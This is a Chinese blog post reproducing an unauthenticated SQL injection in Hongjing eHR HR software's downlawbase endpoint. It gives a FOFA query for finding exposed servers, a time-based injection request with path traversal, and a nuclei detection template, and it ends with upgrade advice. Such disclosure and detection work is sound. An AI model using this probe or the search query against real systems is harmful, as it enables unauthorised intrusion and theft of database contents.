宏景eHR downlawbase SQL注入漏洞复现

宏景eHR人力资源管理软件存在未授权的SQL注入漏洞,允许远程攻击者执行恶意SQL指令,可能威胁数据库安全。建议用户尽快升级到最新版本并打补丁以防止信息泄露和数据篡改。
摘要由CSDN通过智能技术生成

1.漏洞介绍

​ 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。HJ-eHR主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用

​ 宏景eHR downlawbase 接口处存在,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“HJSOFT-HCM”

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5.POC
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

nuclei检测

id: hongjing-hcm-downlawbase-sql
info:
  name: 宏景ehr-hcm-downlawbase-sql注入
  author: test
  severity: critical
  description: |
    宏景EHR人力资源管理系统downlawbase接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
  impact: |
    攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作
  remediation: |
    升级版本,打补丁
  metadata:
    verified: true
    max-request: 3
    fofa-query: app="HJSOFT-HCM" || body="宏景" || body="/general/sys/hjaxmanage.js"
  tags: hongjing-HCM,sql
requests:
  - raw:
      - |
        @timeout:10s
        GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=11';waitfor+delay+'0:0:5'--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: close
    matchers:
      - type: dsl
        condition: and
        dsl:
          - "duration>=5"
          - status_code==200

6.修复建议

更新到最新版本

7.参考信息
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值